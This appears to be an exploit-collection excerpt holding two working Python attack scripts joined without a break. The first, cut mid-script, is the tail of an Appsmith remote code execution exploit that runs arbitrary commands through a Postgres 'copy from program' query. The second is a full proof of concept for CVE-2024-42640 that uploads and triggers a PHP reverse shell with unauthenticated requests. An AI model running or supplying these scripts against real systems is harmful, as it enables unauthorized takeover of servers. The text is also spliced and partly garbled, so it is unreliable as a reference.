except requests.exceptions.HTTPError as e:
# If the environments API fails, use the workspace ID we already have
print(f"Could not fetch environment details: {e}")
print("Using existing workspace ID for datasource creation...")
workspace_id_value = workspace_id
except (ValueError, IndexError):
print("Response content is not valid JSON or does not contain enough plugins:", sixth_response.text)
# After the eighth request to get workspace details
if workspace_id_value:
ninth_request_url = f"{base_url}/api/v1/datasources"
ninth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasource/temp-id-0?from=datasources&pluginId=671a669f4e7fe242d9885195",
"Cookie": f"{cookie_name}={cookie_value}",
}
ninth_request_data = {
"pluginId": plugin_id,
"datasourceStorages": {
workspace_id_value: {
"datasourceConfiguration": {
"properties": [None, {"key": "Connection method", "value": "STANDARD"}],
"connection": {
"mode": "READ_WRITE",
"ssl": {"authType": "DEFAULT"}
},
"endpoints": [{"port": "5432", "host": "localhost"}],
"sshProxy": {"endpoints": [{"port": "22"}]},
"authentication": {
"databaseName": "postgres",
"username": "postgres",
"password": "postgres"
}
},
"datasourceId": "",
"environmentId": workspace_id_value,
"isConfigured": True
}
},
"name": "Untitled datasource 1",
"workspaceId": workspace_id
}
print('Connecting to vulnerable postgres database...')
ninth_response = requests.post(ninth_request_url, headers=ninth_request_headers, json=ninth_request_data)
ninth_response.raise_for_status()
# Extracting the ID from the response
try:
ninth_response_json = ninth_response.json()
datasource_id = ninth_response_json.get("data", {}).get("id")
except (ValueError, KeyError):
print("Response content is not valid JSON or does not contain the expected structure:", ninth_response.text)
# After the ninth request to create the datasource
if datasource_id:
# 10th Request
tenth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview"
tenth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3",
"Cookie": f"{cookie_name}={cookie_value}",
}
tenth_request_data = {
"title": "SELECT",
"body": "create table poc (column1 TEXT);",
"suggested": True
}
print("Creating the table 'poc'...")
tenth_response = requests.post(tenth_request_url, headers=tenth_request_headers, json=tenth_request_data)
tenth_response.raise_for_status()
# 11th Request
eleventh_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview"
eleventh_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3",
"Cookie": f"{cookie_name}={cookie_value}",
}
eleventh_request_data = {
"title": "SELECT",
"body": f"copy poc from program '{command_arg}';",
"suggested": True
}/CVE-2024-55963-Appsmith-RCE
print("Running command...")
eleventh_response = requests.post(eleventh_request_url, headers=eleventh_request_headers, json=eleventh_request_data)
eleventh_response.raise_for_status()
# 12th Request
twelfth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id
twelfth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3",
"Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie
}
# Request body for the 12th schema preview
twelfth_request_data = {
"title": "SELECT",
"body": "select * from poc;",
"suggested": True
}
# Print statement before the 12th request
print("Reading command output from poc table...\n")
# Make the POST request for the 12th schema preview
twelfth_response = requests.post(twelfth_request_url, headers=twelfth_request_headers, json=twelfth_request_data)
# Extracting and printing the response from the 12th schema preview
try:
twelfth_response_json = twelfth_response.json()
# Extracting the specific data
body_data = twelfth_response_json.get("data", {}).get("body", [])
column1_values = [item.get("column1") for item in body_data] # Extract only the column1 values
print("Command output:")
print("----------------------------------------")
for value in column1_values:
print(value) # Print each column1 value
print("----------------------------------------\n")
except (ValueError, KeyError):
print("Response content is not valid JSON or does not contain the expected structure:", twelfth_response.text) # Print the raw response for debugging
# Cleanup Request
cleanup_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id
cleanup_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3",
"Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie
}
# Request body for cleanup
cleanup_request_data = {
"title": "SELECT",
"body": "DROP TABLE poc;", # Command to drop the table
"suggested": True
}
# Make the POST request for the cleanup
print('\nDropping the table...')
cleanup_response = requests.post(cleanup_request_url, headers=cleanup_request_headers, json=cleanup_request_data)
# Exploit Title: Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)
# Date: 10 October 2024
# Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9)
# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9)
# Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload
# Software Link: https://github.com/adonespitogo/angular-base64-upload
# Version: prior to v0.1.21
# Tested on: Arch Linux
# CVE : CVE-2024-42640
# Severity: Critical - 10.0 (CVSS 4.0)
# Github Link : https://github.com/rvizx/CVE-2024-42640
# Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
# DISCLAIMER:
# This proof-of-concept (POC) exploit is provided strictly for educational and research purposes.
# It is designed to demonstrate potential vulnerabilities and assist in testing the security posture of software systems.
# The author expressly disclaims any responsibility for the misuse of this code for malicious purposes or illegal activities.
# Any actions taken with this code are undertaken at the sole discretion and risk of the user.
# The author does not condone, encourage, or support any unauthorized access, intrusion, or disruption of computer systems.
# Use of this POC exploit in any unauthorized or unethical manner is strictly prohibited.
# By using this code, you agree to assume all responsibility and liability for your actions.
# Furthermore, the author shall not be held liable for any damages or legal repercussions resulting from the use or misuse of this code.
# It is your responsibility to ensure compliance with all applicable laws and regulations governing your use of this software.
# Proceed with caution and use this code responsibly.
#!/bin/python3
import re
import subprocess
import requests
import sys
import os
import uuid
import base64
def banner():
print('''
\033[2mCVE-2024-42640\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \033[2m PoC Exploit
\033[0mRavindu Wickramasinghe\033[2m | rvz (ラヴィズ) - twitter: @rvizx9
https://github.com/rvizx/\033[0mCVE-2024-42640
''')
def enum(url):
print("\033[94m[inf]:\033[0m enumerating for dependency installtion directories... ")
target = f"{url}/bower_components/angular-base64-upload/demo/index.html"
r = requests.head(target)
if r.status_code == 200:
print("\033[94m[inf]:\033[0m target is using bower_components")
else:
print("\033[94m[inf]:\033[0m target is not using bower_components")
target = f"{url}/node_modules/angular-base64-upload/demo/index.html"
r = requests.head(target)
if r.status_code == 200:
print("\033[94m[inf]:\033[0m target is using node_modules")
else:
print("\033[94m[inf]:\033[0m target is not using node_modules")
print("\033[91m[err]:\033[0m an error occured, it was not possible to enumerate for angular-base64-upload/demo/index.html")
print("\033[93m[ins]:\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory")
print("\033[93m[ins]:\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html")
print("\033[91m[err]:\033[0m exiting..")
exit()
version = next((line for line in requests.get(target.replace("demo/index.html","CHANGELOG.md")).text.splitlines() if 'v0' in line), None)
print("\033[94m[inf]:\033[0m angular-base64-upload version: ",version)
exploit(target)
def exploit(target):
print(f"[dbg]: {target}")
target_server_url = target.replace("index.html","server.php")
print(f"[dbg]: {target_server_url}")
payload_url = "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php"
print("\033[94m[inf]:\033[0m generating a php reverse shell to upload..")
ip = input("\033[93m[ins]:\033[0m enter listener ip / domain: ")
port = input("\033[93m[ins]:\033[0m enter listenter port: ")
print(f"\033[93m[ins]:\033[0m start a listener, execute nc -lvnp {port}")
input("\033[93m[ins]:\033[0m press enter to continue...")
print("\033[94m[inf]:\033[0m downloading php-reverse-shell from github/pentestmonkey...")
response = requests.get(payload_url)
if response.status_code == 200:
php_code = response.text.replace("127.0.0.1", ip).replace("1234", port) # replacing default values with user input
payload_name = str(uuid.uuid4())+".php" # using a uuid for payload name
with open(payload_name, "w") as file:
file.write(php_code)
else:
print("\033[91m[err]:\033[0m failed to fetch the php-reverse-shell.")
print("\033[91m[err]:\033[0m exiting..")
exit()
with open(payload_name, 'rb') as file:
file_content = file.read()
base64_payload = base64.b64encode(file_content).decode('utf-8')
headers = {
'Content-Type': 'application/json',
}
json_data = {
'base64': base64_payload,
'filename': payload_name,
}
response = requests.post(target_server_url, headers=headers, json=json_data, verify=False)
print("\033[94m[inf]:\033[0m file upload request sent! [status-code]: ",response.status_code)
updemo_endpoint = f"uploads/{payload_name}"
print(f"[dbg]: {updemo_endpoint}")
payload_url = target_server_url.replace("server.php",updemo_endpoint)
print(f"[dbg]: {payload_url}")
if response.status_code == 200:
print(f"\033[94m[inf]:\033[0m reverse-shell is uploaded to {payload_url}")
print("\033[94m[inf]:\033[0m executing the uploaded reverse-shell..")
r = requests.get(payload_url)
if r.status_code == 200:
print("\033[94m[inf]:\033[0m process complete!")
else:
print("\033[91m[err]:\033[0m something went wrong!")
print("\033[93m[ins]:\033[0m please check the listener for incoming connections.")
if __name__ == "__main__":
try:
banner()
url = sys.argv[1]
print(f"\033[94m[inf]:\033[0m target: {url}")
enum(url)
except:
print("[usg]: ./exploit.py <target-url>")
exit()